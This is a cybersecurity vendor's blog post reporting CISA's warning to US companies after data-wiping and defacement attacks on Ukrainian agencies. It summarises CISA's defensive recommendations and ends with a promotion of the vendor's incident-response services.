The Cybersecurity and Infrastructure Security Agency (CISA) is urging United States companies to tighten their cybersecurity defenses against data-wiping attacks like those that recently targeted Ukrainian government agencies and businesses. According to BleepingComputer, Ukrainian government agencies and corporate companies were targeted by coordinated cyberattacks that defaced their websites and deployed data-wiping malware to corrupt data and cause Windows devices to become inoperable.
Sources informed a cybersecurity journalist that the threat operators used the CVE-2021-32648 vulnerability in the OctoberCMS platform to conduct the website defacements. According to the Ukraine Cyber Police, they’re investigating threat operators using the Log4j vulnerabilities and stolen credentials to access networks and servers. Another victim was a Ukrainian IT services company that helped developed the websites, which raises concerns about a supply-chain attack. Originally, the website defacements and data-wiping attacks were thought to be two different attacks. However, Ukraine issued a statement that companies were hit by both attacks leading them to believe they were coordinated.
There’s a high probability that the cyberattacks on the government agencies’ website’s interface (replacing displayed information) and data destruction are intended to cause serious damage to the state electronic resource infrastructure. Ukraine explains that Russia is responsible for the attacks with security experts attributing the attacks to a state-sponsored hacking group, Ghostwriter, that has ties with Belarus.
CISA is urging United States companies and business leaders to implement various steps to prevent similar destructive attacks on their networks. Even though the recommendations by CISA are in response to the cyberattacks on Ukraine, the suggested steps will help prevent network intrusions that could lead to ransomware attacks.
Steps to Reduce Possible Damaging Cyber Intrusions:
- Verify that all remote access to a network and privileged or administrative data requires multi-factor authentication.
- Confirm software is up to date, prioritizing updates that address known exploited vulnerabilities identified by CISA.
- Certify that IT personnel have disabled all ports and protocols not essential for business purposes.
- Ensure the IT personnel reviews and implements strong controls if companies are using cloud services.
- Sign up for CISA’s free cyber hygiene services that include vulnerability scanning to reduce exposure to threats.
Steps to Detect Potential Intrusions:
- Ensure Cybersecurity/IT personnel identify and assess any unexpected or unusual network behavior. Enable logging to better investigate issues or incidents.
- Confirm the company’s entire network is protected by antivirus/antimalware software and the signatures are updated.
- Take extra care to monitor, inspect, and isolate traffic if you’re working with Ukrainian companies; closely review access control for the traffic.
- Have an incident-response team designated with main points of contact for suspected cybersecurity incidents and responsibilities within the company, including technology, communications, legal and continuous business.
- Assure key personnel are available and identify means to provide surge support in responding to incidents.
- Conduct tabletop exercises ensuring all participants understand their roles during an incident.
Maximize Resilience to Destructive Cyber Incidents:
- Test backup procedures and infrastructure, ensuring that critical data can be restored if impacted by ransomware or a destructive cyberattack. Make sure the backups are isolated from network connections.
- If a company uses industrial control systems or operational technology, conduct tests on the manual controls to verify that critical functions remain operable if the network becomes unavailable or untrusted.
With the recent data-wiping attacks against Ukrainian government agencies and organizations, CISA recommends that cybersecurity and IT personnel review their bulletin on mitigating Russian state-sponsored cyber threats on US-based critical infrastructure. Additionally, companies should remain alert on the latest threat landscape and take the precautionary steps mentioned above to reduce the risk of a potential cyber intrusion. At SpearTip, our certified engineers specialize in incident response capabilities and handling breaches. Our engineers continuously monitor companies’ networks at our Security Operations Centers for potential threats like data-wiping attacks. Our ShadowSpear Platform, our endpoint detection and response tool, integrates with cloud, network, and endpoint devices to provide extra security in preventing exploits and stopping the full attack cycle.
If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.